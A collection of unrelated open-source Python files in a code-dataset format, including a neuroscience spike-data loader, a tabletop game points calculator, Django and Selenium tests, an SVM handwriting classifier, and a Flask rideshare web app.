\n\n This class is used to process condense the Phy output into a single npy file.\n \"\"\"\n\n def __init__(self, dirname, load_waveforms=False, load_lfp=True, qc='bombcell'):\n \"\"\"\n :input dirname: name of kilosort output directory with Phy data\n :input load_waveforms: whether to load the waveforms for each cluster.\n :input load_lfp: whether to load the downsampled LFP data for this probe.\n :input qc: whether to use the bombcell unittype file ('bombcell') or the kilosort unit type file ('ks')\n\n.\n \"\"\"\n vals = {}\n # load params from python file\n print(\"Loading ephys variables\")\n with open(os.path.join(dirname, \"params.py\")) as f:\n for line in f:\n fields = line.rstrip().split(\" \")\n vals[fields[0]] = fields[2]\n self._dirname = dirname\n self._dat_path = vals['dat_path'][1:-1] # to unquote\n self._n_channels_dat = vals['n_channels_dat']\n self._dtype = vals['dtype']\n self._offset = vals['offset']\n #self._sample_rate = float(vals['sample_rate'])\n self._hp_filtered = vals['hp_filtered']\n\n # load all variables\n self._chan_map = np.load(os.path.join(dirname, \"channel_map.npy\")) # active channels\n self._chan_pos = np.load(os.path.join(dirname, \"channel_positions.npy\")) # channel positions in um \n self._spike_times = np.load(os.path.join(dirname, \"spike_times_sec_adj.npy\")).flatten() # time adjusted spikes in seconds\n if load_waveforms:\n self._mean_waveforms = np.load(os.path.join(dirname, \"mean_waveforms.npy\")) # average waveforms for each cluster. this is hundreds of MBs\n else:\n self._mean_waveforms = None\n \n self._clusts = np.load(os.path.join(dirname, \"spike_clusters.npy\")).flatten() # cluster for each spike\n self._spike_templates = np.load(os.path.join(dirname, \"spike_templates.npy\")).flatten()\n self._templates = np.load(os.path.join(dirname, \"templates.npy\")) # the whitened template waveforms [nTemplates x nTimesPoints x nChannels]\n self._ntemplates = self._templates.shape[0]\n self._winv = np.load(os.path.join(dirname, \"whitening_mat_inv.npy\")) # used to unwhiten templates into raw data space\n\n if os.path.exists(os.path.join(dirname, \"cluster_info.tsv\")):\n self._metrics = pd.read_csv(os.path.join(dirname, \"cluster_info.tsv\"), sep=\"\\t\")\n else:\n self._metrics = pd.read_csv(os.path.join(dirname, \"metrics.csv\"))\n self._good, self._noise, self._mua = self._load_cluster_types(dirname, qc=qc)\n self._metrics[\"noise\"] = np.zeros_like(self._metrics[\"cluster_id\"])\n self._metrics[\"good\"] = np.zeros_like(self._metrics[\"cluster_id\"])\n self._metrics[\"mua\"] = np.zeros_like(self._metrics[\"cluster_id\"])\n self._metrics.loc[self._metrics[\"cluster_id\"].isin(self._noise), \"noise\"] = 1\n self._metrics.loc[self._metrics[\"cluster_id\"].isin(self._good), \"good\"] = 1\n self._metrics.loc[self._metrics[\"cluster_id\"].isin(self._mua), \"mua\"] = 1\n self._clust_id = np.unique(self._metrics[\"cluster_id\"])\n self._clust_depths = self._chan_pos[self._metrics[\"peak_channel\"][np.argsort(self._metrics[\"cluster_id\"])]][:,1]\n self._clust_xpos = self._chan_pos[self._metrics[\"peak_channel\"][np.argsort(self._metrics[\"cluster_id\"])]][:,0]\n \n if load_lfp:\n self._lfp, self._lfp_chans, self._lfp_fs = self.load_downsampled_lfp(dirname)\n else:\n self._lfp, self._lfp_chans, self._lfp_fs = (None, None, None)\n\n def load_downsampled_lfp(self, dirname, temporal_downsample=10, spatial_downsample=4):\n \"\"\"\n Load and downsample LFP for a given probe.\n \"\"\"\n parent_dir = os.path.dirname(dirname)\n lf_fn = 
glob.glob(os.path.join(parent_dir, f\"*imec*.lf.bin\"))[0]\n chanmap_fn = glob.glob(os.path.join(parent_dir, \"*chanMap.mat\"))[0]\n connected = np.squeeze(scipy.io.loadmat(chanmap_fn)[\"connected\"])\n lfp_data = sglx_util.Reader(lf_fn)\n fs = lfp_data.fs\n # subsample LFP data spatially and temporally -- take every 4th channel, every 10 samples\n lfp_sub = lfp.subsample_lfp(lfp_data._raw, np.arange(384)[connected.astype('bool')][::spatial_downsample], temporal_downsample)\n chan_ix = np.arange(np.sum(connected))[::spatial_downsample]\n lfp_data.close()\n return lfp_sub, chan_ix, fs/temporal_downsample\n \n def _load_cluster_types(self, dirname, qc='bombcell'):\n noise = []\n good = []\n mua = []\n if qc == 'bombcell':\n fname = os.path.join(dirname, \"cluster_bc_unitType.tsv\")\n if not os.path.exists(fname):\n raise ValueError('No bombcell qc file!')\n with open(fname) as f:\n for l in f:\n fields = l.rstrip().split(\"\\t\")\n if fields[0] == \"cluster_id\":\n pass\n else:\n cluster_id = int(fields[0])\n cluster_type = fields[1]\n if cluster_type == \"GOOD\":\n good.append(cluster_id)\n elif (cluster_type == \"MUA\") or (cluster_type == \"NON-SOMA\"):\n mua.append(cluster_id)\n elif cluster_type == \"NOISE\":\n noise.append(cluster_id)\n\n else:\n fname = os.path.join(dirname, \"cluster_group.tsv\")\n with open(fname) as f:\n for l in f:\n fields = l.rstrip().split(\"\\t\")\n if fields[0] == \"cluster_id\":\n pass\n else:\n cluster_id = int(fields[0])\n cluster_type = fields[1]\n if cluster_type == \"good\":\n good.append(cluster_id)\n elif cluster_type == \"mua\":\n mua.append(cluster_id)\n elif cluster_type == \"noise\":\n noise.append(cluster_id)\n return np.array(good), np.array(noise), np.array(mua)","repo_name":"erichamc/brainwide-npix","sub_path":"bwnpix/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":14569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"11553803806","text":"import PySimpleGUI as sg\nimport json\n\n\ndat = 0\nwith open(\"points.json\", \"r\") as F:\n dat = json.load(F)\n\n\nfactions = []\nfor faction in dat:\n factions.append(faction)\n\nsg.theme('DarkAmber') # Keep things interesting for your users\n\n# Initial window\nlayout = [[sg.Text('Points Calculator',key=\"TITLE_TEXT\")], \n [sg.DropDown(values=factions, size=(20, 12), key='FACTION', readonly=True)],\n [sg.Button('Load Faction'), sg.Exit()]] \nwindow = sg.Window('40K Points', layout) \nHEIGHT=1\nFACTION = \"\"\nwhile True: # The Event Loop\n event, values = window.read() \n print(event, values)\n \n if event == 'Load Faction':\n factionLayout = [[sg.Text('Points Calculator',key=\"TITLE_TEXT\")], \n [sg.DropDown(values=factions, size=(20, 12), key='FACTION', readonly=True)],\n [sg.Button('Load Faction'), sg.Exit()],\n [sg.Text(\"Total: 0\", key=\"FACTION_TOTAL\")]\n ] \n FACTION = values[\"FACTION\"]\n for unit in dat[values[\"FACTION\"]]:\n # Create model count array\n if 'count' not in dat[values[\"FACTION\"]][unit]:\n dat[values[\"FACTION\"]][unit]['count'] = 0 \n \n # create a row \n row = [sg.Text(unit + \" x\" + str(dat[values[\"FACTION\"]][unit]['models']), size=(20, HEIGHT)),\n sg.Text(str(dat[values[\"FACTION\"]][unit]['points']),size=(10, HEIGHT) ),\n sg.Button('-',size=(2, 1),key=unit+\"-\"),\n sg.Button('+',size=(2, 1),key=unit+\"+\"),\n sg.Text('x' + str(dat[values[\"FACTION\"]][unit]['models'] * dat[values[\"FACTION\"]][unit]['count']) + ' = ' + str(dat[values[\"FACTION\"]][unit]['points'] * 
dat[values[\"FACTION\"]][unit]['count']),size=(20, HEIGHT), key=unit+str(\"TOTAL\"))]\n factionLayout.append(row)\n\n \n window.close()\n window = sg.Window('Window that stays open', factionLayout) \n elif event == sg.WIN_CLOSED or event == 'Exit':\n break \n\n else:\n if event[len(event)-1] == \"+\":\n dat[FACTION][event[0:len(event)-1]]['count'] += 1\n elif event[len(event)-1] == \"-\":\n dat[FACTION][event[0:len(event)-1]]['count'] -= 1\n if dat[FACTION][event[0:len(event)-1]]['count'] < 0:\n dat[FACTION][event[0:len(event)-1]]['count'] = 0\n\n window[event[0:len(event)-1]+str(\"TOTAL\")].update(\n'x' + str(dat[FACTION][event[0:len(event)-1]]['models'] * dat[FACTION][event[0:len(event)-1]]['count']) + ' = ' + str(dat[FACTION][event[0:len(event)-1]]['points'] * dat[FACTION][event[0:len(event)-1]]['count'])\n)\n FACTION_TOTAL=0\n for unit in dat[FACTION]:\n FACTION_TOTAL += dat[FACTION][unit]['count'] * dat[FACTION][unit]['points']\n window[\"FACTION_TOTAL\"].update(\"Total: \" + str(FACTION_TOTAL))\n\n\nwindow.close()\n","repo_name":"jmtoniolo/40K_Points","sub_path":"point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7205757829","text":"from urllib import response\nfrom django.urls import reverse, resolve\nfrom django.test import TestCase, SimpleTestCase, Client\nfrom ventas.views import ProductosView\nfrom ventas.models import Producto\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom rest_framework.test import APIClient\nfrom django.contrib.auth.models import User\nfrom api.models import Libro\nfrom api.serializers import LibroSerializer\nimport os\n\nclass TestIntegracion(TestCase):\n def setUp(self):\n self.client = APIClient()\n self.user = User.objects.create_user(username=\"admin\",password=\"admin\")\n self.client.force_authenticate(user=self.user)\n\n def test_get_libros(self):\n Libro.objects.create(nombre_libro=\"Libro 1\", autor=\"Autor 1\", editorial=\"Editorial 1\")\n Libro.objects.create(nombre_libro=\"Libro 2\", autor=\"Autor 2\", editorial=\"Editorial 2\")\n\n response = self.client.get('/libros/')\n\n\n self.assertEqual(response.status_code, 200)\n\n libros = Libro.objects.filter(activo=True)\n serializer = LibroSerializer(libros, many=True)\n \n self.assertEqual(serializer.data, response.data)\n\n def test_post_libro(self):\n data = {\n \"nombre_libro\": \"Libro 3\", \n \"autor\": \"Autor 3\",\n \"editorial\": \"Editorial 3\",\n \"activo\": False\n }\n \n #Pruebas internas del endpoint /libros/ POST\n response = self.client.post(\"/libros/\", data, format=\"json\")\n self.assertEqual(response.status_code, 201)\n data.pop(\"activo\")\n self.assertEqual(response.data, data)\n\n #Prueba de integración con base de datos\n libro_creado = Libro.objects.get(nombre_libro=\"Libro 3\")\n self.assertEqual(libro_creado.autor, data['autor'])\n self.assertEqual(libro_creado.editorial, data['editorial'])\n\n #Prueba de integración con /libros/ GET\n libro_nuevo = self.client.get('/libros/')\n self.assertNotIn(response.data, libro_nuevo.data)\n \n\nclass FunctionalTest(TestCase):\n def test_login_wrong_data(self):\n driver = webdriver.Chrome()\n driver.get(\"http://localhost:8000/login\")\n driver.maximize_window()\n\n wait = 
WebDriverWait(driver, 10)\n time.sleep(2)\n \n\n input_user = driver.find_element(By.ID,\"id_usuario\")\n input_password = driver.find_element(By.ID,\"id_password\")\n\n input_user.send_keys('a')\n time.sleep(2)\n input_password.send_keys('a')\n time.sleep(2)\n boton_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div/div/div/form/div[6]/button')))\n boton_iniciar_sesion.click()\n time.sleep(2)\n\n danger_alert = driver.find_element(By.XPATH,\"/html/body/div/div/div/form/div[4]/small\")\n time.sleep(2)\n\n self.assertEqual(danger_alert.text, \"Usuario inválido\")\n\n \n\n def test_open_local_project(self):\n driver = webdriver.Chrome()\n driver.get(\"http://localhost:8000/\")\n driver.maximize_window()\n driver.implicitly_wait(5)\n\n wait = WebDriverWait(driver, 10)\n time.sleep(2)\n nav_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"navbarNav\"]/ul/li[2]/a')))\n nav_iniciar_sesion.click()\n\n input_user = driver.find_element(By.ID,\"id_usuario\")\n input_password = driver.find_element(By.ID,\"id_password\")\n\n input_user.send_keys('Daniel')\n time.sleep(2)\n input_password.send_keys('admin')\n time.sleep(2)\n boton_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div/div/div/form/div[6]/button')))\n boton_iniciar_sesion.click()\n \n nav_iniciar_sesion = wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"navbarNav\"]/ul/li[2]/a')))\n nav_iniciar_sesion.click()\n\n nav_productos = wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"navbarNav\"]/ul[1]/li[2]/a')))\n nav_productos.click()\n html = driver.find_element(By.TAG_NAME, 'html')\n html.send_keys(Keys.END)\n time.sleep(2)\n input_nombre = driver.find_element(By.ID,\"id_nombre\")\n input_descripcion = driver.find_element(By.ID,\"id_descripcion\")\n input_precio = driver.find_element(By.ID,\"id_precio\")\n input_archivo = driver.find_element(By.ID,\"id_archivos\")\n\n tbody = driver.find_element(By.XPATH,'//*[@id=\"tabla\"]/tbody')\n filas = tbody.find_elements(By.TAG_NAME,'tr')\n print(len(filas))\n\n time.sleep(2)\n input_nombre.send_keys(\"Celular Samsung Galaxy\")\n time.sleep(2)\n input_descripcion.send_keys(\"Más pantalla, más espacio para jugar. Disfruta cualquier detalle con su pantalla de 6.6” 90Hz. La batería te durará casi 2 días (dependiendo el uso del dispositivo) y tiene una recarga ultra rápida de 25W. Toma selfies 1.6 x más claras y captura cada detalle con su triple cámara de 50MP. Navega rápidamente con la red 5G y el poderoso procesador 4.0 x Single y 1.8 x Multi. 
Comparte lo que necesites con Quick Share y obtén\")\n time.sleep(2)\n input_precio.send_keys(\"2799\")\n time.sleep(2)\n input_archivo.send_keys(os.path.abspath('test.txt'))\n time.sleep(2)\n guardar_producto = wait.until(EC.presence_of_element_located((By.ID,\"boton_guardar\")))\n guardar_producto.click()\n time.sleep(2)\n tbody = driver.find_element(By.XPATH,'//*[@id=\"tabla\"]/tbody')\n filas_despues = tbody.find_elements(By.TAG_NAME,'tr')\n print(len(filas_despues))\n time.sleep(6)\n self.assertNotEqual(len(filas), len(filas_despues))\n\n\ndef suma(a, b):\n return a + b\n\n\n\nclass TestUnitarioVentas(TestCase):\n def setUp(self):\n self.producto = Producto.objects.create(\n nombre = \"Microfono\",\n descripcion = \"Negro\",\n precio=2000,\n activo=False\n )\n self.producto2 = Producto.objects.create(\n nombre = \"Microfono 2\",\n descripcion = \"Negro\",\n precio=2000\n )\n self.url_productos = reverse(\"productos\")\n self.client = Client()\n\n\n def test_suma(self):\n self.assertEqual(suma(3, 9), 12)\n \n def test_productos_url(self):\n self.assertEqual(resolve(self.url_productos).func.view_class, ProductosView)\n \n def test_productos_creados(self):\n \n self.assertEqual(self.producto.nombre, \"Microfono\")\n\n def test_productos_get_status_code(self):\n response = self.client.get(self.url_productos)\n self.assertEqual(response.status_code, 200)\n\n def test_productos_get_context_products_inactivos(self):\n response = self.client.get(self.url_productos)\n self.assertNotIn(self.producto, response.context['productos'])\n\n def test_productos_get_context_products_activos(self):\n response = self.client.get(self.url_productos)\n self.assertIn(self.producto2, response.context['productos'])\n\n","repo_name":"DanielGtz/PythonFullStackVentas","sub_path":"ventas/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":7256,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21520466394","text":"from Img import Img\nfrom sklearn import svm, preprocessing\nimport numpy as np\nfrom random import randint\nfrom PIL import Image\nimport os\nimport pickle as pk\n\nclass Model():\n def __init__(self):\n self.classes = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n #opening the pickle and loading the model inside it\n try:\n pickle = open(\"model.pickle\", \"rb\")\n self.model = pk.load(pickle)\n except:\n print(\"WARNING: the model does not exist(might be due to not being trained)\")\n\n def train_test_split(self, size = 20):\n \"\"\"\n creates the data from the data/letters folder and returns x_train, y_train, x_test, y_test\n size(the precent of the test data that is taken from the whole data)\n \"\"\"\n x = [] #features\n y = [] #labels \n\n #extracts the data from the letters folder\n num_label = 0\n for folder in self.classes:\n folder_len = os.listdir(f\"data/letters/{folder}\")\n folder_len = [file for file in folder_len if \".png\" in file]\n folder_len = len(folder_len)\n for i in range(folder_len):\n letter_img = Image.open(f\"data/letters/{folder}/{i}.png\") #gets the image\n letter_img = np.asarray(letter_img, dtype = np.float64) #converts the image to a numpy array\n x.append(letter_img)\n y.append(self.classes.index(folder))\n num_label += 1\n\n #suffles the data\n for i in range(len(x)*10):\n r_i = randint(0, len(x) - 1) #creates a random index to pop from the 
list\n #pops same element from x and y\n pop_x = x.pop(r_i)\n pop_y = y.pop(r_i)\n #appends each popped element to each corresponding list\n x.append(pop_x)\n y.append(pop_y)\n\n percent_split = int((size * len(x)) / 100)\n\n \n #splits the data to train and test data\n x_train = np.array(x[:-percent_split])\n y_train = np.array(y[:-percent_split])\n x_test = np.array(x[percent_split:])\n y_test = np.array(y[percent_split:])\n \n return(x_train, y_train, x_test, y_test)\n\n def fit(self):\n \"\"\"trains the model on the data\"\"\"\n x_train, self.y_train, x_test, self.y_test = self.train_test_split()\n #flattens the arrays of the images 35x35->1225\n flat_x_train = [im.flatten() for im in x_train]\n flat_x_test = [im.flatten() for im in x_test]\n self.x_train = np.array(flat_x_train)\n self.x_test = np.array(flat_x_test)\n\n #defining and training the model\n self.model = svm.SVC(gamma = \"auto\", kernel = \"poly\", tol = 1e-8) #defines the model\n self.model.fit(self.x_train, self.y_train)\n accuracy = self.model.score(self.x_test, self.y_test)\n\n #opens the file with the setting of writing in binary and saves the trained model\n with open(\"model.pickle\", \"wb\") as f:\n pk.dump(self.model, f)\n\n return(accuracy)\n\n def predict(self, img_path):\n \"\"\"predicts a given picture of a word and returns the prediction\"\"\"\n img = Img(img_path)\n letters = img.preprocess()\n word = \"\"\n #runs throught each letter, predicts them and adds each to the word\n for letter in letters:\n letter = letter.flatten()\n letter = letter.reshape(1, -1)\n prediction = self.model.predict(letter)\n word += self.classes[prediction[0]] #\"prediction[0]\" because the prediction comes out as an array\n\n return(word)","repo_name":"PLAZMAMA/Word_Reader","sub_path":"code_files/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"28085594348","text":"from .atcoder import AtcoderMatcher\nfrom .topcoder import TopcoderMatcher\nfrom .yukicoder import YukicoderMatcher\n\n\ndef classify_urls_by_contest_sites(urls: list) -> dict:\n \"\"\"\n Classify urls by contest sites.\n :param urls: list of urls\n :return: dict of urls classified by contest sites\n \"\"\"\n contest_sites = [AtcoderMatcher, YukicoderMatcher, TopcoderMatcher]\n classified_urls = {contest_site._key_name: [] for contest_site in contest_sites}\n classified_urls[\"others\"] = []\n\n for url in urls:\n matched = False\n for contest_site in contest_sites:\n if contest_site.match(url):\n classified_urls[contest_site._key_name].append(url)\n matched = True\n break\n if not matched:\n classified_urls[\"others\"].append(url)\n\n return classified_urls\n","repo_name":"edge2992/prog_shojin_util","sub_path":"prog_shojin_util/utils/contest_sites/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39465284150","text":"import datetime\r\nimport functools\r\nfrom turtle import title\r\nimport uuid\r\nfrom flask import Blueprint, flash, redirect, render_template, current_app, url_for, session\r\nfrom .models import RideSchema, UserSchema, UserSchema\r\nfrom .forms import RideForm, RegistrationForm, LoginForm\r\nfrom dataclasses import asdict, dataclass\r\nfrom passlib.hash import pbkdf2_sha256\r\n\r\npages = Blueprint(\r\n \"pages\", __name__, template_folder=\"templates\", 
static_folder=\"static\"\r\n)\r\n\r\ndef login_required(route):\r\n @functools.wraps(route)\r\n def route_wrapper(*args, **kwargs):\r\n if session.get(\"email\") is None:\r\n return redirect(url_for(\".login_user\"))\r\n\r\n return route(*args, **kwargs)\r\n\r\n return route_wrapper\r\n\r\n\r\n# /API_test\r\n# General case HTML test template\r\n@pages.route(\"/API_test\")\r\ndef test_page():\r\n return render_template(\r\n template_name_or_list=\"api_test.html\")\r\n\r\n\r\n# /\r\n# Index (Home page) Route Endpoint\r\n@pages.route(\"/\")\r\n@login_required\r\ndef index():\r\n available_rides = current_app.db.rides_collection.find(\r\n {\"completion_status\": {\"$ne\": \"true\"}})\r\n ret_available_rides = [RideSchema(**ride) for ride in available_rides]\r\n return render_template(\r\n template_name_or_list=\"index.html\",\r\n title=\"Rides @ Grinnell College\",\r\n list_of_available_rides=ret_available_rides)\r\n\r\n# /add_ride\r\n# Endpoint to request_ride\r\n\r\n\r\n@pages.route(\"/request_ride\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef request_ride():\r\n form = RideForm()\r\n\r\n if form.validate_on_submit():\r\n input_ride_info = RideSchema(\r\n _id=uuid.uuid4().hex,\r\n requester_name=session.get(\"username\"),\r\n request_date=datetime.datetime.combine(\r\n form.req_date.data, datetime.time()),\r\n request_time=form.req_time.data,\r\n request_destination=form.req_dest.data,\r\n round_trip=form.rnd_trip.data,\r\n offered_compensation=form.compensation.data,\r\n datetime_flexibility=form.dtime_flexibility.data,\r\n additional_comments=form.cmnt.data\r\n )\r\n\r\n current_app.db.rides_collection.insert_one(asdict(input_ride_info))\r\n\r\n current_app.db.registered_users.update_one(\r\n {\"_id\": session[\"user_id\"]},\r\n {\"$push\": {\"rides_requested_by_user\": input_ride_info._id}}\r\n )\r\n\r\n return redirect(url_for('.index'))\r\n\r\n return render_template(\r\n template_name_or_list=\"new_ride.html\",\r\n title=\"Rides @ Grinnell - Request a ride\",\r\n form=form)\r\n\r\n# /register\r\n# Endpoint to register user\r\n\r\n\r\n@pages.route(\"/register\", methods=[\"GET\", \"POST\"])\r\ndef register_user():\r\n if session.get(\"email\"):\r\n return redirect(url_for('.index'))\r\n\r\n registration_form = RegistrationForm()\r\n\r\n if registration_form.validate_on_submit():\r\n user_registration_data = UserSchema(\r\n _id=uuid.uuid4().hex,\r\n user_email=registration_form.email.data,\r\n username=registration_form.name.data,\r\n user_password=pbkdf2_sha256.hash(registration_form.pwd.data)\r\n )\r\n\r\n current_app.db.registered_users.insert_one(\r\n asdict(user_registration_data))\r\n flash(\"User registered successfully\")\r\n return redirect(url_for('.login_user'))\r\n\r\n return render_template(\r\n template_name_or_list=\"register.html\",\r\n title=\"Rides @ Grinnell - Register\",\r\n registration_form=registration_form\r\n )\r\n\r\n\r\n# /login\r\n# Endpoint to login user\r\n@pages.route(\"/login\", methods=[\"GET\", \"POST\"])\r\ndef login_user():\r\n if session.get(\"email\"):\r\n return redirect(url_for(\".index\"))\r\n\r\n login_form = LoginForm()\r\n\r\n if login_form.validate_on_submit():\r\n user_data = current_app.db.registered_users.find_one(\r\n {\"user_email\": login_form.email.data})\r\n\r\n if not user_data:\r\n flash(\"User with the email address not found\", category=\"danger\")\r\n return redirect(url_for('.login_user'))\r\n\r\n user = UserSchema(**user_data)\r\n\r\n if user and pbkdf2_sha256.verify(login_form.pwd.data, user.user_password):\r\n 
session[\"user_id\"] = user._id\r\n session[\"username\"] = user.username\r\n session[\"email\"] = user.user_email\r\n return redirect(url_for('.index'))\r\n\r\n flash(\"Incorrect login credentials\")\r\n\r\n return render_template(\r\n template_name_or_list=\"login.html\",\r\n title=\"Rides @ Grinnell - Login\",\r\n login_form=login_form\r\n )\r\n\r\n# /logout\r\n# Endpoint to logout the user\r\n\r\n\r\n@pages.route(\"/logout_user\")\r\n@login_required\r\ndef logout():\r\n session.clear()\r\n return redirect(url_for('.login_user'))\r\n\r\n# /my_rideshare_accout\r\n# Endpoint to the user's account\r\n\r\n\r\n@pages.route(\"/my_account/\")\r\n@login_required\r\ndef my_account(_id: str):\r\n load_user_data = current_app.db.registered_users.find_one(\r\n {\"user_email\": session[\"email\"]})\r\n user_data = UserSchema(**load_user_data)\r\n\r\n load_ride_data = current_app.db.rides_collection.find(\r\n {\"_id\": {\"$in\": user_data.rides_requested_by_user}})\r\n rides_data = [RideSchema(**ride) for ride in load_ride_data]\r\n\r\n account_name = user_data.username\r\n return render_template(\r\n template_name_or_list=\"my_account.html\",\r\n title=f\"Rides @ Grinnell - {account_name}\",\r\n list_of_requested_rides=rides_data)\r\n\r\n\r\n# /my_account/<_id:uuid.uuid4.hex()>/delete_ride\r\n@pages.route(\"/my_account//delete_ride/\")\r\n@login_required\r\ndef delete_ride(user_id:str,ride_id:str):\r\n current_app.db.rides_collection.delete_one({\r\n \"_id\":ride_id\r\n })\r\n\r\n return redirect(url_for('.my_account',_id=user_id))\r\n ","repo_name":"sauryanshu55/rideshare-at-grinnell","sub_path":"rideshare_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22079763159","text":"import requests as req\nimport pandas as pd\nimport json\nimport os.path\nfrom typing import List\n\nfrom PyLagoon.config import LagoonConfig\nfrom PyLagoon.postgresql import PGMeta, build_sql_query\nfrom PyLagoon.source import Source\n\n\nclass Lagoon:\n def __init__(self, config, host=None, port=None):\n \"\"\"\n Connects to lagoon-server. 
config is a LagoonConfig\n \"\"\"\n\n self.__host = host if host else config.LAGOON_HOST\n self.__port = port if port else config.LAGOON_PORT\n self.__conn_str = \"http://{0}:{1}/\".format(self.__host, self.__port)\n self.__cfg = config\n self.__cookies = None\n if self.__cfg.is_connected_mode:\n self.__cookies = self.__connect()\n\n def __connect(self):\n reply = req.post(\n self.conn_str + \"user/login\",\n json={\"user\": self.__cfg.USER, \"pass\": self.__cfg.PASSWORD},\n )\n if reply.ok:\n return reply.cookies\n else:\n raise Exception(\"Authentication failed\")\n\n @property\n def is_authenticated(self):\n return self.__cookies != None\n\n @property\n def conn_str(self):\n return self.__conn_str\n\n def sources(self, ontoClass=None, tags=None, columns=None, **kwargs):\n \"\"\"args can be name, ix, user, createrAfter, createrBefore, ontoClass, group, etc.\n Use ontoClass instead of class, as it is a reserved python keyword\"\"\"\n if ontoClass:\n kwargs[\"class\"] = ontoClass\n if tags:\n kwargs[\"tag\"] = tags\n if columns:\n kwargs[\"columns\"] = columns\n reply = req.get(self.conn_str + \"sources\", params=kwargs, cookies=self.__cookies)\n return [Source(j) for j in reply.json()]\n\n def ingest(self, file_path, name, ontoClass=None, tags=None, **kwargs):\n \"\"\"\n Uploads a new dataset to the server.\n\n The available options are the same than for the REST interface of lagoon.\n Returns the newly created Source.\n \"\"\"\n if ontoClass:\n kwargs[\"class\"] = ontoClass\n if tags:\n kwargs[\"tag\"] = tags\n kwargs[\"name\"] = name\n kwargs[\"input\"] = os.path.split(file_path)[1]\n # So the server can guess the fileType\n reply = req.post(\n self.conn_str + \"sources\",\n data=open(file_path, \"rb\"),\n params=kwargs,\n stream=True,\n cookies=self.__cookies,\n )\n report = (json.loads(line.decode(\"utf-8\")) for line in reply.raw)\n stack = []\n last = None\n for e in report:\n if last:\n print(\"Status: \" + str(last))\n last = None\n if isinstance(e, dict) and e.get(\"start\"):\n stack.append(e[\"start\"])\n elif isinstance(e, dict) and e.get(\"notice\"):\n print(e[\"notice\"])\n elif isinstance(e, str):\n finished = stack.pop()\n if e == \"ok\":\n print(\"Done: \" + finished)\n else:\n raise Exception(\"Ingest signalled \" + str(e) + \" when \" + finished)\n else:\n last = e\n return Source(last)\n\n def my_sources(self, **kwargs):\n \"\"\"A shortcut for self.sources(name=)\"\"\"\n return self.sources(user=self.__cfg.USER, **kwargs)\n\n def users(self):\n \"\"\"Get a list of the users\n TODO: Fix it!\"\"\"\n reply = req.get(self.conn_str + \"users\")\n return reply.json()\n\n def download_source(self, source):\n \"\"\"Constructs a DataFrame containing an entire source\n \"\"\"\n is_json = any(c[\"type\"][0] == \"JSON\" for c in source.columns)\n if is_json:\n # We need a JSON document in that case\n # the sql endpoint will return one\n meta = PGMeta([source])\n table = meta[source]\n return self.__tbl_from_raw_sql(build_sql_query(meta.query(table)))\n else:\n reply = req.get(\n self.conn_str + \"source/\" + str(source.ix) + \"/download\",\n stream=True,\n cookies=self.__cookies,\n )\n if reply.ok:\n return pd.read_csv(reply.text)\n\n def download_query(self, query, sources):\n \"\"\"Constructs a DataFrame from a SQLAlchemy query and corresponding sources\n\n Note that this method will sequentially search for each columns type in the list\n of sources and take the first match. 
This is necessary since query results only\n include column names and not data source identifiers.\n \"\"\"\n return self.__tbl_from_raw_sql(build_sql_query(query), sources)\n\n def __tbl_from_raw_sql(self, query, sources):\n reply = req.post(\n self.conn_str + \"sql\", json={\"sql\": query}, stream=True, cookies=self.__cookies\n )\n reply.raise_for_status()\n return _query_to_df(reply.json(), sources)\n\n\ndef _group_rows(rows: List[dict]):\n columns = {}\n for row in rows:\n for c, v in row.items():\n if c in columns:\n columns[c].append(v)\n else:\n columns[c] = [v]\n return columns\n\n\ndef _get_dtype(col_name, sources):\n for source in sources:\n if col_name in source.col_types:\n return source.col_types[col_name]\n return object\n\n\ndef _query_to_df(rows, sources):\n grouped = _group_rows(rows)\n col_names = list(grouped.keys())\n series = []\n for name in col_names:\n vals = grouped.pop(name)\n series.append(pd.Series(vals, name=name, dtype=_get_dtype(name, sources)))\n df = pd.concat(series, axis=1)\n df.columns = col_names\n return df\n","repo_name":"tweag/lagoon","sub_path":"clients/PyLagoon/PyLagoon/lagoon.py","file_name":"lagoon.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"43"} +{"seq_id":"28997598466","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom arm_lib.srv import *\n\nimport numpy as np\nimport sys\nimport rospy\n\n\n\n\ndef rotate_translate_client(a,b,c,d,e,f,g):\n rospy.wait_for_service('rotation_translation') # Wait until a service becomes available\n\n try:\n rotate_translate= rospy.ServiceProxy('rotation_translation', rotateAndTranslate)\n #service defintions are a container for the request and respone type. 1 2 3\n resp1 = rotate_translate(a,b,c,d,e,f,g)\n\n rotated = np.round(np.array([resp1.h, resp1.i, resp1.j],dtype='float32'),2)\n 